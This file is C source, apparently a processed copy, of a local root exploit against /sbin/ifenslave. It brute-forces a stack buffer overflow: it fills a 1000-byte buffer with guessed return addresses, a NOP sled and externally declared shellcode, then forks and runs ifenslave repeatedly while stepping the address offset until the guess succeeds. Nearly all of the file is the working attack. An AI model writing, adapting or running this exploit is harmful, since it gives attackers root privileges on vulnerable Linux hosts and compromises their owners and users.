
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int pid_t ;


 char NOP ;
 int RET ;
 scalar_t__ WIFEXITED (int) ;
 int execl (char*,char*,char*,int *) ;
 int exit (int) ;
 int fork () ;
 int printf (char*,...) ;
 char* shellcode ;
 int strlen (char*) ;
 int wait (int*) ;

int main(int argc, char **argv)
{
 int x=0, status, i;
 int offset=20;
 char buffer[1000];
 long retaddr;
 pid_t pid;

 retaddr=RET+offset;
 printf("\n[+] 0dd ifenslave local root xpl ;D\n\n");
 printf("[~] Trying offset %d, addr 0x%x\n",x, retaddr);


 while(x<=300)
 {

  if((pid=fork())==0)
  {




   for (i=0;i<200;i+=4) {
    *(long *)&buffer[i] = retaddr;
   }
   for (i=0;i<100;i++) {
    buffer[i+200] = NOP;
   }
   for (i=0;i<strlen(shellcode);i++) {
    buffer[i+300] = shellcode[i];
   }

   execl("/sbin/ifenslave","/sbin/ifenslave",buffer,((void*)0));



  }


  wait(&status);

  printf("[~] Received signal: #%i\n", status);



  if(WIFEXITED(status) != 0 ) {
   printf("[+] Retaddr guessed: 0x%x\n[~] Exiting...\n", retaddr);
   exit(1);
  } else {



   retaddr+=offset;
          x+=offset;
   printf("[~] Trying offset %d, addr 0x%x\n",x, retaddr);
  }
 }
}
